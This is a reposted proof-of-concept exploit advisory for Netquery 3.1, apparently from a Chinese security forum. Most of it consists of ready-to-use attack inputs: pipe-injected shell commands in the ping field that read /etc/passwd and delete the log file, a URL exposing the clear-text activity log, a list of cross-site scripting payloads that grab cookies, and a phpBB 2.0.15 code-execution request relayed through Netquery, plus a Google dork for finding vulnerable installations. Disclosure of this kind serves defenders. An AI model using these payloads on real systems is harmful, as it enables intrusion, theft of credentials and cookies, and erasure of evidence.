[转载]Netquery 3.1远程命令执行 跨站脚本 信息泄露漏洞
文章作者:rgod[at]autistici.orgNetquery 3.1 remote commands execution, cross site scripting, information disclosure poc exploit
software:
author site: [url]http://www.virtech.org/tools/[/url]
a user can execute commands on target system by PING panel, if enabled like often happens, using pipe char on
"Ping IP Address or Host Name" input text box, example:
| cat /etc/passwd
then you will see plain text password file
| pwd
to see current path
| rm [pwd_output]/logs/nq_log.txt
to delete log file...
disclosure of user activity:
if enabled, a user can view clear text log file through url:
http://[target]/[path]/logs/nq_log.txt
xss:
http://[target]/[path]/submit.php?portnum="/><script>alert(document.cookie)</script>
http://[target]/[path]/nqgeoip2.php?step=<script>alert(document.cookie)</script>
http://[target]/[path]/nqgeoip2.php?body=<script>alert(document.cookie)</script>
http://[target]/[path]/nqgeoip.php?step=<script>alert(document.cookie)</script>
http://[target]/[path]/nqports.php?step=<script>alert(document.cookie)</script>
http://[target]/[path]/nqports2.php?step=<script>alert(document.cookie)</script>
http://[target]/[path]/nqports2.php?body=<script>alert(document.cookie)</script>
http://[target]/[path]/portlist.php?portnum=<script>alert(document.cookie)</script>
a user can use on-line Netquery installations like proxy servers
to launch exploit from HTTP GET request panel, example:
exploiting Phpbb 2.0.15:
make a get request of
http://[vulnerable_server]/[path]/viewtopic.php?t=[existing_topic]&highlight='.system($HTTP_GET_VARS[command]).'&command=cat%20/etc/passwd
googledork: inurl:nquser.php
rgod
email: rgod[at]autistici.org
site: [url]http://rgod.altervista.org[/url]
exp:
[url]http://www.eviloctal.com/forum/read.php?tid=12775[/url]
页:
[1]